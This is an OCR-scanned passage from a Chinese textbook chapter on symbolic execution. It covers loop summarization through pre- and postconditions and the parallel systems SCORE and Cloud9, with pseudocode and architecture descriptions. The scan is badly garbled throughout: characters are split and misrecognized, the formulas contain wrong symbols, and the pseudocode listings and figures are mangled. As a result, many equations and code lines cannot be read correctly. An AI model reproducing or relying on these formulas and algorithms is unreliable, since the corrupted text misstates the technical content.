CD 循环 前 置 条 件 。 

假设 循环 L 中 只 有 一 个 循环 守卫 G, 则 如 果 程 序 能 够 退出 循环 ,一 定 是 从 条 件 语 句 G 
的 分 支 中 退出 ,可 以 说 GTLG]. EC 决定 了 循环 的 执行 次 数 (GT[G]. EC 的 取 值 等 于 循环 
L 的 实际 执行 次 数 )。 从 EC 变量 的 定义 可 知 ,其 值 与 D 和 dD 的 取 值 范围 有 关 , 如 果 和 希望 
循环 正常 退出 (EC! = 吕 ), 则 路 径 约 东 必 定 满足 条 件 GT[G]. DeondS A GT [pc]. 
dDcondS; 反 之 ,通过 求解 约束 GTLG]. DeondS A GTLpc]. dDcondS 得 到 的 测试 用 例 可 以 
使 程序 执行 遍历 条 件 语句 G 的 then 和 else 分 支 。 用 GT[G]. DeondS A GT [pc]. 
dDcondS 替换 路 径 约 束 中 和 条 件 分 支 G 相关 的 约束 条 件 ,一 方面 保证 了 对 条 件 语句 G 的 
分 支 遍历 , 另 一 方面 防止 了 符号 执行 引擎 在 路 径 搜索 时 对 G 的 约束 条 件 的 不 断 扩展 ( 程 
序 分 析 无 法 终止 问题 的 根源 ) 。 

当 循 环 L 中 存在 多 个 循环 守卫 时 ,如 果 程 序 能 够 退出 循环 , 则 必定 是 从 某 个 循环 守 
TH. G, 处 退出 的 , 即 ,循环 的 迭代 次 数 由 GT[G,]. EC 决定 。 可 以 确定 的 是 ,在 循环 内 所 有 
守卫 语句 的 EC 值 中 ,GT[G,]. EC 的 值 是 最 小 。 因 为 引 理 1 和 引 理 2 的 存在 ,可 以 对 循 
环 体 中 的 守卫 语句 进行 排序 : Gi Gs ,排序 按照 G; 在 代码 中 出 现 的 先后 顺序 进行 。 根 
据 前 面 的 分 析 , 这 里 可 以 对 GT [G, ]. EC 做 出 如 下 约束 ,这 里 将 该 约束 条 件 称 为 
min(G,) ,min(G, ) 是 保证 循环 从 G, 处 退出 的 必要 条 件 : 

GT[G]. ECS < GT[G']. ECS if G' < G 
GT[G]. ECS < GT[G']. ECS if G < G' 

上 面 的 表达 式 中 的 变量 G' 表 示 排 序 在 G, 之 前 的 所 有 循环 守卫 。 约 东 条 件 min(G,) 
保证 了 GTLG, ]. EC 的 取 值 是 最 小 的 ,但 如 果 要 循环 能 够 从 G, 处 退出 ,还 需要 满足 条 件 
GTLG].DcondSA GT[G]. dDecondS, 即 ,通过 求解 约束 集合 pc A min(G,) A GT[G ]. 
DcondS A GT[G]. dDcondS. ,就 可 以 对 条 件 语 句 G, 的 分 支 进行 定向 的 遍历 。 另 外 ,需要 
从 路 径 条 件 中 移 除 所 有 与 Gi Gs 4G, 相关 的 约束 条 件 , 防 止 对 某 个 条 件 分 支 G; 的 无 
限 扩展 。 

循环 前 移 条 件 的 核心 思想 就 是 对 路 径 条 件 中 的 元 余 约 东 进 行 化 简 , 防 止 符号 执行 引 
擎 在 遍历 路 径 时 对 某 个 条 件 分 支 G; 中 的 约束 条 件 无 限 扩展 。 循 环 前 置 条 件 的 生成 过 程 
用 代码 描述 如 图 5-23 所 示 o 

© 循环 后 置 条 件 。 

通过 归纳 变量 表 的 筛选 ,可 以 知道 循环 体 中 哪些 变量 与 迭代 次 数 相关 (c,x)。 归 纳 变 
量 x 与 main 函数 的 输入 参数 直接 相关 ,x 的 初始 符号 表示 为 xs ,由 此 可 以 判断 循环 守卫 


VG'zG 
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1 guess preconditions ( pc , GT ) { 

2 ctr= true; 

3 forl € GT in insertion order { 

4 for pos € GT[I].pclocs { 

5 if pos # GT[G1].loc 

6 remove ( path constraint , pos ) ; 
7 

8 


} 
ctr= ctr ^ GT[I].DcondS ; 
9 ctr 7 ctr ^ GT[I]J.dDcondS ; 
} 


11 forl € GT in insertion order { 
12 if (l # pe) { 








13 ctr = ctr ^ ( Min (lI) = false ) ; 

14 } else ( 

15 etr 7 ctr ^ ( Min (I) = true ) ; 

16 break ; 

17 } 

18 |] 

19  replace( path constraint , GT(Gi].loc , ctr ) ; 
20 } 


图 $-23 ”循环 前 置 条 件 生成 代码 描述 


中 所 有 依赖 于 x 的 条 件 分 支 都 是 可 控 的 。 归 纳 变量 c 和 符号 变量 x, 并 没有 直接 关系 , 那 
是 不 是 if(c 王 =50) 语 句 就 不 可 控 呢 ? 答案 当然 是 否定 的 。 因 为 归纳 变量 表 筛 选 出 的 所 
有 变量 都 与 循环 迭代 次 数 有 某 种 线性 关系 ,只 要 其 中 有 一 个 变量 与 符号 变量 相关 ,就 一 定 
可 以 求 出 其 他 归纳 变量 与 符号 的 表示 关系 。 经 过 研究 P. G 得 到 关系 表达 式 : VS 十 dVS 
* (GGT[G]. ECS— D ,这 里 的 G 就 是 循环 退出 时 最 后 执行 的 循环 守卫 。 

以 变量 c 为 例 , 其 符号 表达 式 为 es — 02-1 * (x — D — x — 1. BEDA ifCe— — 50) P f 
约束 条 件 就 可 以 替换 成 ((xo 一 1)!=50) ,最 后 将 该 约束 条 件 添 加 到 路 径 约 束 中 。 原 本 对 
于 循环 守卫 if(c 二 二 50) ,只 知道 其 有 机 会 可 以 控制 该 分 支 , 但 不 知道 如 何 构造 用 例 使 程 
序 遍 历 该 分 支 语句 ,通过 归纳 变量 表 和 循环 守卫 表 的 帮助 ,就 实现 了 对 该 分 支 的 直接 
控制 。 

循环 后 置 条 件 的 核心 思想 就 是 将 归纳 变量 表 中 的 变量 与 函数 的 输入 参数 建立 关系 ， 
从 而 实现 对 所 有 循环 守卫 的 定向 遍历 。 循 环 后 置 条 件 的 生成 过 程 用 代码 描述 如 图 5-24 
所 示 。 

以 图 5-20 中 的 代码 为 例 , 说 明 循环 摘要 是 如 何 分 析 程序 循环 的 。 假 设 main 函数 的 
初始 值 x, —10 ,程序 首次 执行 从 G1=if(x 二 ==0) 处 退出 ,对 程序 执行 路 径 进 行 分 析 , 可 以 
得 到 while 循环 中 包含 x c 两 个 变量 以 及 if(x 二 0) 和 if(c 二 二 50) 两 个 循环 守卫 。 利 用 归 
纳 变量 表 和 循环 守卫 表 得 到 的 中 间 结 果 计算 得 到 前 后 置 条 件 分 别 为 preloop — Cx, 00 fI 
postloop— (c— x, — 1) ,使 用 preloop 对 路 径 约束 pc 进行 优化 ,即使 用 preloop(xo 二 0) 替 
换 约束 集合 (xo 二 0) A 09 71D A t A 097790 A Ox — 100) ,根据 后 置 条 件 可 知 c 为 符 
号 变量 ,而 c!1—50 之 前 并 不 存在 于 路 径 条 件 中 ,所 以 这 里 将 约束 (x 一 1)!=50 添加 至 路 
径 约 束 集合 ,使 用 循环 摘要 方法 优化 后 pe— (xo 二 0) A((Cx0 一 1)!=50)。 使 用 分 代 搜 索 
算法 对 pc 进行 路 径 遍历 , 首 先 会 对 约 东 条 件 (x 一 1)!=50 取 反 得 到 (x 一 1) 王 一 50， 





1symbolic update ( v , VS dVS , ECS ) { 

2 VS- VS - dVS * (ECS- 1); 

3 S-S«[v— VS]: 

4j 

5 guess postconditions ( iteration , IVT , GT ) { 

6 if (GT[I].pending is true for somel € GT ) 

T return ; // another summarization pending 

8 forl € GT in insertion order { 

9 if (GT[I].EC — iteration ) ( // last iter . predicted 

10 forv € IVT{ 

11 symbolic update ( v , IVT[v].VS ,IVT[v].dVS ,GT[D.ECS ) ; 
} 


12 

13 GT[I].pending = true ; 
14 break ; 

15 } 

16 } 








图 5-24 循环 后 置 条 件 生成 代码 描述 


pcl— (270) A CO — D — 50) ,求解 得 到 xo 二 51。 将 x, —51 带 入 main 函数 进行 测试 ， 
可 以 看 到 原本 不 可 控 的 条 件 语句 if(c 王 一 50) 已 经 可 以 定向 遍历 了 ,同时 并 没有 出 现 无 限 
扩展 的 问题 ,这 也 就 是 循环 摘要 方法 的 优势 所 在 。 
(3) 循环 摘要 方法 的 问题 。 
循环 摘要 方法 虽然 很 好 地 缓解 了 循环 问题 ,但 仍 存在 部 分 问题 需要 解决 : 
。 循环 摘要 方法 对 循环 中 的 条 件 语句 添加 了 很 多 限制 ,这 制约 了 其 在 实际 测试 环境 
中 的 效果 。 
。 循环 摘要 目前 只 能 对 线性 变化 的 情况 进行 处 理 , 对 于 非 线性 的 变化 仍然 无 能 
为 力 。 





5.3 并行 符号 执行 技术 
53.1 基本 思想 


传统 符号 执行 面临 3 个 主要 问题 : 路 径 爆 炸 、 路 径 约 束 求解 过 载 和 内 存 使 用 过 载 。 
当 符 号 执行 引擎 测试 大 规模 程序 时 ,通常 会 遇 到 路 径 爆 炸 问题 ,导致 测试 时 间 超出 测试 周 
期 可 接受 的 范围 。 同 时 ,路 径 爆 炸 问题 还 会 导致 测试 节点 的 内 存 使 用 接近 满 负荷 状态 ,很 
多 情况 下 符号 执行 引擎 无 法 继续 运行 都 是 因为 内 存 不 足 引起 的 。 由 于 以 上 问题 的 存在 ， 
目前 大 部 分 符号 执行 工具 对 于 规模 庞大 或 逻辑 复杂 的 程序 仍然 无 法 有 效 测试 。 研 究 人 员 
在 此 情况 下 提出 并 行 符号 执行 方案 ,希望 通过 计算 集群 可 无 穷 扩 展 的 内 存 空 间 和 CPU 
资源 来 缓解 符号 执行 中 的 路 径 爆 炸 问题 。 

在 并 行 技术 与 符号 执行 技术 融合 的 过 程 中 ,需要 解决 两 个 关键 问题 。 

1. 分 布 式 环境 下 的 路 径 搜 索 策略 

如 何 有 效 避 免 各 节点 对 程序 执行 路 径 的 重复 搜索 是 并 行 系统 需要 解决 的 首要 问题 。 
虽然 一 个 程序 的 执行 树 在 测试 开始 前 是 未 知 的 ,但 对 于 传统 的 单 节点 符号 执行 引擎 来 说 
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影响 较 小 ,因为 每 次 只 需要 对 一 个 路 径 进 行 探索 ,通过 简单 的 标记 等 辅助 手段 就 可 以 避免 
对 路 径 的 重复 探索 。 对 并 行 系统 来 说 执行 树 未 知 的 影响 是 很 大 的 ,因为 同一 时 刻 各 工作 
节点 都 在 对 路 径 进行 探索 ,并且 受 限于 带宽 等 因素 ,各 节点 很 难 实时 共享 已 探索 路 径 的 信 
息 , 这 就 很 容易 造成 不 同 节点 对 同一 路 径 的 宛 余 探索 ,影响 系统 的 运行 效率 。 研 究 人 员 和 希 
望 通过 设计 适应 于 并 行 环境 的 路 径 搜索 算法 ,从 根本 上 避免 系统 对 路 径 的 重复 探索 。 

2. 分 布 式 环境 下 的 负载 均衡 策略 

如 何 划分 任务 集合 ,使 得 各 工作 节点 避免 出 现 负 载 不 均衡 的 情况 是 所 有 并 行 系统 都 
需要 解决 的 核心 问题 。 假 设 并 行 系统 能 够 将 程序 执行 树 动态 划分 成 多 个 互 不 重合 的 子 
树 ,并 保证 没有 宛 余 的 路 径 探索 行为 ,并 行 系统 还 是 很 难保 证 这 些 子 树 的 规模 是 均衡 的 。 
出 现 该 问题 的 关键 就 在 于 程序 执行 树 本 身 就 不 是 平衡 二 叉 树 ,如 图 5-25 所 示 , 动 态 划 分 
后 的 各 子 树 规模 差别 极 大 ,这 样 对 子 树 的 遍历 时 间 也 是 差别 很 大 的 ,部 分 工作 节点 可 能 很 
快 就 会 进入 空闲 等 待 状态 ,而 部 分 子 树 可 能 仍 需要 花费 大 量 时 间 才 能 完成 测试 ,这 样 的 并 
行 系统 对 效率 的 提升 也 是 有 限 的 。 所 以 并 行 系统 需要 路 径 搜 索 算法 和 负载 均衡 算法 的 配 
合 , 在 减少 节点 间 宛 余 工 作 的 同时 ,尽量 保证 各 节点 的 负载 均衡 。 





图 5-25 ”分布 式 负载 均衡 
下 面 对 各 并 行 系统 的 分 析 也 都 以 解决 这 两 个 问题 为 主线 ,希望 给 读者 以 启发 。 
532 并 行 系统 SCORE 


本 节 介绍 基于 分 代 搜 索 算法 的 并 行 符 号 执行 系统 SCORE?” 。 

在 前 面 介绍 SAGE 系统 的 章节 中 ,读者 可 能 已 经 产生 了 疑问 ,既然 分 代 搜 索 算法 每 
一 轮 搜索 可 以 产生 大 量 的 约束 表达 式 及 测试 用 例 ,为 什么 SAGE 仍然 选择 在 单 节点 上 序 
列 化 的 执行 用 例 集合 ,而 不 是 将 生成 的 用 例 分 散 到 多 个 节点 上 同时 进行 测试 ? 这样 做 能 
否 使 系统 整体 的 执行 效率 得 到 提升 呢 ? 答案 是 肯定 的 ,ParSym 及 SCORE 等 并 行 符号 执 
行 系统 就 是 基于 这 样 的 想法 设计 实现 的 。 

但 实现 过 程 中 需要 注意 哪些 内 容 ? 下 面 就 以 SCORE 系统 为 例 ,说 明基 于 分 代 搜 索 
算法 的 并 行 系统 的 设计 思路 及 具体 细节 。 
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1. 并 行 算法 设计 


SCORE 使 用 的 并 行路 径 搜 索 算法 是 在 SAGE 系统 的 分 代 搜 索 算 法 基础 上 设计 的 ， 
或 者 说 ,只 在 原 算法 的 基础 上 做 了 少量 的 删 减 操作 。 为 什么 分 代 搜 索 算法 适用 于 并 行 系 
统 呢 ,只 是 因为 其 一 轮 搜 索 过 程 可 以 生成 多 个 用 例 吗 ? 仪 凭借 这 点 是 远 远 不 够 的 ,并 行路 
径 搜 索 算法 需要 保证 的 是 在 各 子 节点 上 生成 的 测试 用 例 对 应 不 同 的 程序 执行 路 径 , 否 则 
会 造成 不 同 节点 对 路 径 的 重复 探索 。 经 证 明 , 分 代 搜 索 算 法 能 够 保证 在 各 工作 节点 上 生 


成 互 不 相同 的 用 例 ,详细 的 证 明 过 程 可 参考 SCORE 系统 的 相关 系列 论文 。 


不 生成 元 余 任务 只 是 保证 并 行 系统 高 效 运行 的 一 个 重要 环节 ,如 何 避 免 任 意 时 刻 有 
大 量 节 点 处 于 空闲 状态 而 浪费 资源 呢 ? 设计 这 基于 这 个 想法 对 算法 进行 了 改进 ,算法 描 


述 如 图 5-26 所 示 。 





Input: 


qtep= 
TC= 


oaeawmhkwb 一 


11 end 





Ø; // a queue containing ( tc, neg. limit )s 
Ø; // a set of generated test cases 


if startup then 
te= 
Add (tc, 1) to qtcp; 


random value; // initial test case 


Send a request for test cases to another node n'; 
Receive ( tc, neg limit )s from n'; 
10 Add (tc, neg limit )s to qtcp; 


12 while true do 

13 while |qtcp| » 0 do 

14 Remove (tc, neg limit) from qtcp; 
15 // Execute target program on tc 


path = an execution path on tc; 


17 — // Obtain a symbolic path formula ó 
18 — % =a symbolic path formula of path (i.e., c, 


j= lø]; 


20 while j >= neg limit do 


startup : a flag to indicate whether a current node n is a startup node or not. 
Output: 
TC: a set of test cases generated at a current node n (i.e., tcs of line 24) 
DstrConcolic (startup) { 


^e ^ Aes 


21 // Generate ọ for the next input values 
22 9-0 ^7 ^64 ^76; 

23 // Select the next input values 

24 tc = Solve(Q): 

25 if tc is not NULL then 

26 Add (tc, j + 1 ) to qtcp; 

27 TC- TC U (tc); 

28 end 

29 j=j-l; 

30 end 

31 end 

32 if there is a test case in another node n" then 
33 Send a request for test cases to another node n" ; 
34 Receive (tc, neg limit )s from n" ; 

35 Add (tc, neg limit)s to gtcp: 

36 else 

37 Halt; // no test cases exist in all nodes 
38 end 

39 end 

40} 
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在 算法 描述 的 第 7 一 10 行 和 第 33 一 35 行 ,为 了 避免 部 分 子 节点 在 用 例 队 列 qtcp 为 
空 时 一 直 处 于 空闲 状态 ,算法 中 增加 了 主动 向 其 他 子 节点 请 求 新 用 例 的 过 程 (8,33 行 )。 
这 里 需要 注意 的 是 ,节点 在 发 送 用 例 的 同时 ,会 将 其 探索 界限 neg_limit 一 起 传递 ,这 个 变 
量 是 保证 算法 不 会 产生 宛 余 用 例 的 关键 ,所 以 一 定 不 能 省 略 。 


2. 


系统 架构 设计 


图 5-27 就 是 SCORE 根据 并 行 算法 设计 的 系统 架构 。 





服务 器 (Server) 





节点 n n 
队列 状态 | EMPTY | HAS MIC 

































(D REQ TC (2) REQ(n) (4) ACK 


客户 端 n 客户 端 m 
(Client n) (Client n) 
qtcp 

















(3) 传送 测试 用 例 


(Transfer w/neg, limits) 


图 5-27 SCORE 系统 架构 





SCORE 系统 中 包含 两 种 类 型 的 节点 : 服务 器 和 客户 端 。 客 户 端 节点 中 的 任何 一 个 
都 可 以 作为 起 始 节点 ,执行 算法 中 的 4 一 6 行 。 假 设 所 有 客户 端 节点 都 可 以 连接 到 的 服务 
器 节点 , 即 网 络 不 会 出 现 延 迟 或 者 是 断 开 的 情况 。 系 统 中 有 7 种 类 型 的 协议 包 在 服务 器 
和 客户 端 节点 间 传 输 来 实现 节点 的 协同 工作 。 


REQ_TC: 当 客 户 端 n 节点 的 qtcp 为 空 时 向 服务 器 发 送 的 请 求 包 。 

REQ: 服务 器 向 客户 端 nm 节点 发 送 的 请 求 包 , 数 据 包 中 包含 了 发 送 REQ_TC 请 
求 包 的 节点 编号 。 

Transfer; 客户 端 n' 节 点 接收 到 服务 器 发 送 的 REQ(n) 请 求 包 后 ,向 客户 端 n 节 
点 发 送 Transfer 数据 包 , 其 中 包含 新 的 测试 用 例 。 

ACK: 客户 端 n 节点 向 客户 端 n 节点 发 送 Transfer 数据 包 后 ,向 服务 器 发 送 
ACK 响应 包 , 说 明 节 点 已 经 完成 了 操作 。 

NACK: 当 客 户 端 n' 节 点 的 |qtcp| 二 1 时 ,在 接收 到 REQ 请 求 后 直接 向 服务 器 发 
送 NACK 响应 。 

HAS_MTC: 客户 端 m 节点 之 前 已 经 向 服务 器 发 送 了 NACK 响应 包 , 在 客户 端 
n^ Jf atep 71 时 ,会 向 服务 器 发 送 状 态 更 新 包 。 在 上 面 的 系统 结构 图 中 可 
以 看 到 ,服务 器 中 维护 了 一 个 包含 所 有 客户 端 节点 的 qtcp 状态 表 , 所 以 服务 器 每 
次 发 送 REQ 的 对 象 并 不 是 随机 选取 的 ,而 是 通过 遍历 客户 端 状态 表 找到 的 最 合 
适 节 点 。 如 果 客 户 端 n 的 qtcp 每 次 发 生变 化 都 向 服务 器 发 送 状 态 更 新 ,对 带宽 


- 
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和 服务 器 的 处 理 能 力 是 有 很 高 要 求 的 ,所 以 这 里 SCORE 也 选择 了 惰性 更 新 的 


方式 。 
* Stop: 当 所 有 客户 端 节点 的 状态 都 为 空闲 时 ,向 各 节点 发 送 stop 命令 ,停止 测试 
任务 。 


服务 器 维护 的 客户 端 状态 表 中 包含 以 下 4 种 状态 : 

* EMPTY: |qtcp| 二 0, 这 是 状态 表 中 各 客户 端 节点 的 初始 状态 ,或 者 是 在 客户 端 
发 出 NACK 响应 后 ,服务 器 对 状态 表 更 新 后 的 状态 。 

HAS_1TC: |qtcp|=1, 这 是 在 客户 端 发 出 NACK 响应 后 ,服务 器 对 状态 表 更 新 


后 的 状态 。 
* HAS_MTC: |qtcp| 二 1 ,客户 端 节 点 中 的 用 例 数量 大 于 1, 但 目前 仍 没有 处 理 过 
REQ 请 求 。 


SERVING_REQ: 客户 端 节点 中 的 用 例 数量 大 于 1 ,并且 正 在 处 理 REQ 请 求 。 

显然 ,服务 器 在 接收 到 REQ_TC 请 求 后 ,会 从 客户 端 状态 列表 中 选择 HAS MTC 15 
点 客户 端 n' ,如 果 客 户 端 n' 的 1qtcp| 大 于 1, 则 将 | qtcp/2 数量 的 用 例 发 送 到 客户 端 n 5 
点 ,如 果 客 户 端 n' 的 |qtcp| 小 于 等 于 1, 直接 向 服务 器 发 送 NACK 数据 包 , 并 更 新 节点 在 
服务 器 中 记录 的 状态 。 当 所 有 节点 的 状态 都 为 EMPTY 时 ,说 明 任 务 已 经 完成 ,此 时 服 
务 器 就 可 以 向 所 有 客户 端 发 送 stop 命令 。 

上 面 对 SCORE 系统 的 工作 原理 进行 了 介绍 ,下 面 就 来 介绍 另外 一 种 不 使 用 分 代 搜 
索 算 法 ,但 仍然 能 够 高 效 并 行 的 系统 一 一 Cloud9 。 
533 并 行 系统 Cloud9 

基于 KLEE 的 并 行 系统 Cloud9? U 是 第 一 个 并 行 符号 执行 系统 ,由 Liviu Ciortea 等 
人 在 2009 年 发 布 的 并 行 符号 执行 引擎 ,2011 一 2013 年 其 获得 了 多 个 奖项 ,下 面 就 对 其 设 
计 原 理 进行 研究 。 

1. 系统 架构 设计 

Cloud9 的 系统 架构 如 图 5-28 所 示 。 


负载 均衡 节点 
Load balancer 
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符号 执行 环境 (Runtime) 


NE 


路 径 搜索 约束 求解 


Searcher Constraint solver 








Work 
































图 5-28 Cloud9 系统 架构 


Cloud9 中 包含 负载 均衡 节点 (Load balancer) 和 工作 节点 (Worker) 两 种 类 型 节点 。 
每 个 Worker 节点 独立 的 探索 程序 执行 树 中 的 一 个 子 树 。 每 个 Worker 节点 上 都 部 署 了 
一 个 基于 KLEE 实现 的 符号 执行 引擎 ,包括 符号 执行 环境 (Runtime) 约束 求解 模块 
(Constraint solver) 路 径 搜索 模块 (Searcher)3 部 分 。 程 序 运行 的 同时 进行 符号 执行 分 
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析 , 每 当 遇 到 条 件 分 支 时 并 不 会 直接 探索 ,而 是 记录 当前 的 程序 状态 、 程 序 当 前 路 径 上 的 
条 件 分 支 等 信息 ,并 用 这 些 信息 初始 化 一 个 状态 结构 ,使 用 该 结构 可 以 将 程序 恢复 到 执行 
当前 分 支 时 的 状态 。Runtime 将 生成 的 状态 放 入 Worker 的 工作 队列 中 。Searcher 是 
Cloud9 的 路 径 搜索 模块 ,用 来 决定 下 一 个 需要 搜索 的 路 径 。 当 从 Searcher 模块 得 到 预期 
探索 路 径 的 约束 表达 式 后 ,Runtime 模块 就 会 调用 Constraint solver 模块 对 表达 式 进行 
求解 ,通过 求解 结果 初步 判断 该 路 径 是 否 可 达 。 如 果 有 解 则 Runtime 使 用 新 用 例 遍历 对 
应 的 路 径 ,否则 继续 向 Searcher 发 出 请 求 。 

Cloud9 首先 启动 Load balancer, 然 后 启动 Worker 节点 徐 。 当 第 一 个 Worker 节点 
Wi 启动 并 连接 到 LB 时 ,从 LB 获取 种 子 任务 ,并 开始 对 程序 执行 树 进行 探索 。 当 第 二 
个 节点 W 启动 并 连接 到 LB 时 ,LB 会 安排 其 去 分 担 Wi 节点 的 任务 , 即 控制 W 将 部 分 
未 探索 的 子 任务 发 送 到 W 节点 。 以 后 每 当 有 新 的 节点 加 入 到 Worker 1i ji fnr. LB 
都 会 主动 平衡 系统 内 部 节点 的 负载 。Worker 节点 复 也 会 定时 将 其 节点 状态 .负载 情况 以 
及 代码 覆盖 情况 进行 编码 并 发 送 到 LB。 根 据 各 节点 的 负载 状况 ,LB 能 够 主动 进行 均衡 
处 理 , 并 控制 节点 进行 任务 转送 。LB 的 控制 命令 格式 为 二 source worker, destination 
worker, No. of jobs 。 

2. 并 行 算法 设计 

Cloud9 通过 下 面 3 个 算法 的 设计 来 实现 对 程序 执行 树 的 快速 遍历 。 

1) 执行 树 划分 

假设 已 知 程序 的 执行 树 如 图 5-29 左 侧 所 示 , 则 可 以 直接 对 执行 树 进行 划分 ,虽然 不 
能 保证 负载 均 衔 ,但 至 少 可 以 让 各 节点 遍历 互 不 重 释 的 子 树 空间 ,对 执行 效率 会 有 显著 的 
提升 。 但 在 分 析 的 初始 阶段 ,显然 无 法 得 到 程序 完整 的 执行 树 ,那么 能 否 根 据 执 行 树 的 前 
疡 层 的 结构 进行 划分 呢 ? 相对 程序 执行 树 , 前 刀 层 的 子 结构 相对 简单 ,通过 几 次 路 径 探 索 
就 可 以 得 到 ,这 样 就 可 以 对 其 进行 如 图 5-29 右 侧 所 示 的 划分 。Cloud9 对 执行 树 的 划分 
就 是 遵循 这 样 的 基本 策略 。 





图 5-29 程序 执行 树 示例 


2) 负载 均衡 算法 
前 面 对 系统 结构 的 介绍 中 已 经 说 明 , 当 Worker 节点 对 路 径 进 行 探 索 时 ,每 遇 到 新 的 
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条 件 分 支 就 会 生成 对 应 的 状态 结构 ,并 将 该 结构 放 入 Worker 的 工作 队列 中 ,后 续 会 沿 着 
该 状态 指向 的 分 支 路 径 继 续 探 索 。 那么 Worker 队列 中 状态 结构 的 多 少 是 否 就 能 表示 其 
负载 的 多 少 呢 ? 这 样 定义 负载 显然 是 过 于 简单 了 ,还 需要 考虑 到 Worker 节点 硬件 状态 
对 符号 执行 的 影响 ,例如 节点 的 内 存 、.CPU 的 使 用 率 、 约 束 求解 器 的 状态 等 。 假 设 某 个 
Worker 节点 的 工作 队列 中 只 有 一 个 状态 结构 ,但 当前 探索 的 路 径 可 能 很 长 ,造成 内 存 消 
耗 极 大 ,符号 执行 效率 极 低 ,显然 不 能 将 该 节点 定义 为 负载 较 低 。 各 Worker 节点 每 隔 一 
段 时 间 就 会 将 节点 当前 的 负载 情况 发 送 到 Load balancer, 以 便 Load balancer 对 全 系统 
进行 负载 均衡 的 规划 操作 ,如 图 5-30 所 示 。 


void write( int x ) 








if( XXMAX) { 

if ( x20 ) 

ied D A 假 K 
) else { 

if (x>3) 

else E 


图 5-30 ”负载 均衡 代码 示意 


当 Cloud9 开始 运行 的 时 候 ,并 没有 负载 信息 ,所 以 静态 地 划分 搜索 空间 (执行 树 ) 到 
各 工作 节点 ,如 图 5-31(a) 所 示 , 当 系统 中 只 有 两 个 Worker 节点 时 ,将 执行 树 第 一 个 分 支 
处 的 左 子 树 放 到 Wi 节点 进行 探索 , 右 子 树 放 到 W 节点 。 搜 索 空 间 会 在 执行 的 时 候 重 
新 动态 划分 ,因为 随 着 探索 深度 的 增加 ,各 子 树 可 能 非常 不 均衡 。 例 如 图 5-30 中 的 write 
函数 ,如 果 执 行进 入 if(x 二 3) 分 支 , 则 可 能 需要 执行 更 多 的 代码 ,这 可 能 使 得 程序 执行 路 
径 上 遇 到 更 多 的 条 件 分 支 , 所 以 对 if(x 二 3) 分 支 进行 探索 的 节点 可 能 需要 遍历 一 个 更 大 
的 子 树 ,这 就 造成 了 负载 不 均衡 的 情况 。 图 5-31(b) 中 描述 了 一 个 简单 的 负载 不 均衡 的 
例子 : W 节点 可 能 已 经 完成 了 对 其 子 树 的 探索 ,但 Wi 节点 还 在 对 S 子 树 进行 探索 。 

通常 情况 下 ,只 有 在 系统 中 最 高 负载 节点 W 的 负载 是 最 低 节点 w 的 x 信 时 ,Cloud9 
中 的 负载 均衡 模块 Load balancer 才 会 认为 系统 处 于 负载 不 均衡 的 状态 。 通 过 对 实验 数 
据 分 析 发 现 ,将 x 确定 为 10, 当 x 小 于 10 的 时 候 , 系 统 会 频繁 地 进行 负载 均衡 操作 ,在 对 
网 络 带宽 .CPU 等 资源 造成 极 大 浪费 的 同时 并 没有 表现 出 应 有 的 效果 ;如 果 x 大 于 10, 负 
载 均 衡 的 效果 不 明显 ,系统 运行 效率 明显 降低 。 那 么 ,Load balancer 又 是 如 何 工作 的 呢 ? 
当 检 测 到 系统 出 现 负载 不 均衡 的 情况 后 ,Load balancer 会 让 w 和 W 节点 进行 协商 来 平 
衡 两 者 的 负载 。 假设 两 个 节点 已 经 协商 从 W 的 工作 队列 中 传递 状态 集合 {S;} 到 w 的 工 
作 队 列 中 ,正如 前 面 所 介绍 的 ,传递 的 状态 集合 不 仅 需 要 考虑 到 状态 数量 ,还 需要 兼顾 各 
状态 对 本 地 资源 造成 的 消耗 ,例如 部 分 状态 中 可 能 已 经 包含 较 多 的 路 径 条 件 ,或 者 对 内 存 
有 较 高 的 占用 率 。delegate(S,W,w) 表 示 从 W 节点 向 w 节点 传送 状态 集合 S 的 操作 。 


第 5 章 符号 执行 





^ 








^ 
A A 
P V X 


iid 








图 5-31 负载 均衡 对 比 示意 


传递 和 探索 的 过 程 是 同步 进行 的 , 当 S 中 的 某 个 状态 已 经 完全 传递 到 节点 w 后 ,w 就 可 
以 对 该 状态 进行 探索 ,不 需要 等 到 S 的 传递 全 部 完成 。 
delegate 使 用 两 种 方式 来 传递 状态 : 状态 复制 和 状态 重 构 。 
。 状态 复制 。W 记录 程序 执行 到 节点 S; 时 的 状态 ,并 发 送 到 w 节点 的 队列 中 。w 
使 用 该 状态 信息 可 以 直接 恢复 程序 运行 状态 ,并 从 该 节点 开始 继续 探索 任务 。 
。 状态 重 构 。 将 状态 表示 为 一 个 位 数组 ,表示 的 是 从 根 节点 到 当前 节点 的 路 径 , 使 
用 该 位 数组 进行 重 放 可 以 恢复 程序 执行 到 节点 s, 时 的 路 径 。 例 如 图 5-31(b) 中 ， 
可 以 将 si 节点 表示 为 0,s4 节 点 表示 为 01,s? 节 点 表示 为 000, 等 等 。delegate 操作 
中 ,W 只 需要 将 描述 状态 的 位 数组 传递 到 w, w 根据 位 数组 的 指导 程序 从 执行 树 
的 根 节点 执行 到 节点 si 恢复 状态 后 ,从 si 节点 开始 继续 执行 。 
选择 哪 种 传递 方式 需要 结合 系统 所 在 的 网 络 环境 、 计 算 机 硬件 情况 等 因素 。 使 用 状 
态 重 构 方式 对 网 络 带宽 消耗 较 低 , 但 是 恢复 状态 时 需要 在 节点 上 重新 执行 程序 ,会 消耗 
CPU 资源 ,如 果 选 择 状 态 复制 方式 , 则 对 网 络 带宽 有 较 高 的 要 求 。 当 状态 记录 的 节点 离 
执行 树 的 根 节点 较 近 时 ,选择 状态 重 构 方 式 是 最 合适 的 ,反之 选择 状态 复制 方式 可 能 更 
优 。 考 虑 到 实际 使 用 场景 ,Cloud9 最 终 选择 的 是 状态 重 构 方 式 。 
3) 路 径 搜索 算法 
负载 均衡 模块 起 到 了 串联 本 地 策略 与 全 局 目标 的 重要 的 作用 。 例 如 ,如 果 全 局 目标 
是 尽 可 能 高 的 覆盖 率 ,Cloud9 中 Worker 节点 上 的 Searcher 就 可 以 为 每 个 状态 进行 打 
分 ,类 似 SAGE 的 score 函数 ,这 里 的 分 数 也 是 表示 可 能 覆盖 的 新 的 程序 代码 块 。 分 数 高 
的 状态 就 会 排 到 工作 队列 的 前 面 , 可 以 保证 这 些 状态 被 优先 探索 或 者 优先 传递 到 其 他 低 
负载 节点 ,在 其 他 节点 上 被 优先 探索 。 因 此 ,借助 负载 模块 实际 上 是 在 将 本 地 节点 的 目标 
不 断 向 全 局 目标 靠拢 。 
